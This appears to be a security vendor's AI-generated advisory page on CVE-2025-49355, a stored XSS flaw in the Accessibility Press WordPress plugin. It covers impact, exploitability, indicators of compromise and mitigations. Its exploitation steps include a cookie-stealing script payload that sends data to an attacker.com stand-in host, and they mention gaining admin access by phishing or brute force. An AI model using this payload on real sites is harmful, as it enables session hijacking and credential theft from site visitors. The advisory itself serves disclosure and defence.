CVE-2025-49355
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-49355 is a Stored Cross-Site Scripting (XSS) vulnerability in the Accessibility Press WordPress plugin (slug: ilogic-accessibility) developed by ikaes. The flaw allows authenticated attackers with administrator-level privileges to inject and persist malicious scripts that execute in the browsers of site visitors. All plugin versions up to and including 1.0.2 are affected, and no official patch has been released as of the time of publication. The vulnerability was reported by researcher HunSec on September 30, 2025, and publicly disclosed by Patchstack on December 31, 2025. It carries a CVSS v3.1 base score of 5.9 (Medium), assigned by Patchstack (Patchstack).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), meaning the plugin fails to adequately sanitize or escape user-supplied input before storing and rendering it in web pages (Patchstack). The attack vector is network-based and requires high privileges (Administrator role) to inject the malicious payload, but user interaction from a victim (e.g., a site visitor loading the affected page) is required to trigger script execution. Because the payload is stored server-side, every subsequent visitor who loads the affected page will execute the injected script without any further attacker interaction. No public proof-of-concept code has been identified at this time.

Impact

Successful exploitation allows an attacker to inject arbitrary JavaScript into pages served to site visitors, enabling session hijacking, credential theft, malicious redirects, defacement, or delivery of drive-by malware. The CVSS scope is marked as Changed, meaning the impact extends beyond the plugin itself to affect the browsers of end users visiting the compromised WordPress site. Confidentiality, integrity, and availability are each assessed as Low impact in the context of the affected scope, reflecting the constrained but real risk to visitor sessions and site content (Patchstack).

Exploitability

No active in-the-wild exploitation has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.031%, indicating a very low probability of exploitation in the near term (Feedly). Exploitation requires administrator-level access to the WordPress site, which significantly limits the attacker pool. Patchstack classifies this as Low priority with no impactful threat currently observed, though it notes that XSS vulnerabilities of this class are sometimes leveraged in mass-exploit campaigns targeting WordPress plugins at scale (Patchstack).

Exploitation steps

  1. Gain Administrator Access: Obtain WordPress administrator credentials through phishing, credential stuffing, or brute force against the target site's wp-login.php.
  2. Navigate to Plugin Settings: Log in to the WordPress admin dashboard and locate the Accessibility Press plugin settings page (under the plugin's admin menu).
  3. Inject Malicious Payload: In a plugin input field that lacks proper sanitization, enter a stored XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent HTML event-handler payload.
  4. Save the Configuration: Submit the form to persist the malicious script in the WordPress database.
  5. Trigger Execution: When any site visitor (including non-authenticated users) loads a page that renders the affected plugin output, the injected script executes in their browser, potentially stealing session cookies, redirecting to malicious sites, or performing other client-side attacks (Patchstack).

Indicators of compromise

  • Logs: WordPress admin audit logs showing unexpected changes to Accessibility Press plugin settings by an administrator account, particularly from unfamiliar IP addresses or at unusual times.
  • Database: Presence of <script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded payloads (e.g., &#x3C;script&#x3E;) in plugin option rows within the wp_options table associated with the ilogic-accessibility plugin.
  • Network: Outbound requests from visitor browsers to unknown external domains shortly after loading pages with the Accessibility Press widget, potentially visible in web server access logs or browser developer tools.
  • File System: Unexpected modifications to plugin files in wp-content/plugins/ilogic-accessibility/ that could indicate secondary tampering after initial XSS-based compromise.

Mitigation and workarounds

As of the disclosure date, no official patch is available for the Accessibility Press plugin (versions ≤ 1.0.2), and no fixed version has been released (Patchstack). Site administrators should consider the following actions:

  • Deactivate and remove the Accessibility Press plugin until a patched version is available.
  • Apply a virtual patch using a Web Application Firewall (WAF) solution such as Patchstack, Wordfence, or a hosting-level WAF to block exploitation attempts.
  • Restrict administrator access by enforcing strong passwords, multi-factor authentication, and limiting admin account exposure.
  • Monitor plugin updates via the WordPress plugin repository or Patchstack alerts and apply any future patch immediately upon release.

Community reactions

Patchstack, the CNA that assigned and disclosed this CVE, classified it as Low priority with no impactful threat currently observed, and issued early warnings to its customer base on December 31, 2025 (Patchstack). Red Hat also tracked the CVE in its security advisory database (Red Hat). No significant broader media coverage or notable researcher commentary beyond the Patchstack disclosure has been identified.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-77115HIGH7.1
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-77116MEDIUM4.3
  • brave-popup-builder
NoYesAug 23, 2026
CVE-2026-14853MEDIUM4.3
  • woocommerce-bookings
NoYesAug 23, 2026
CVE-2026-77003LOW2.7
  • content-mask
NoYesAug 23, 2026
CVE-2026-13598NONEN/A
  • restrictmate
NoYesAug 23, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management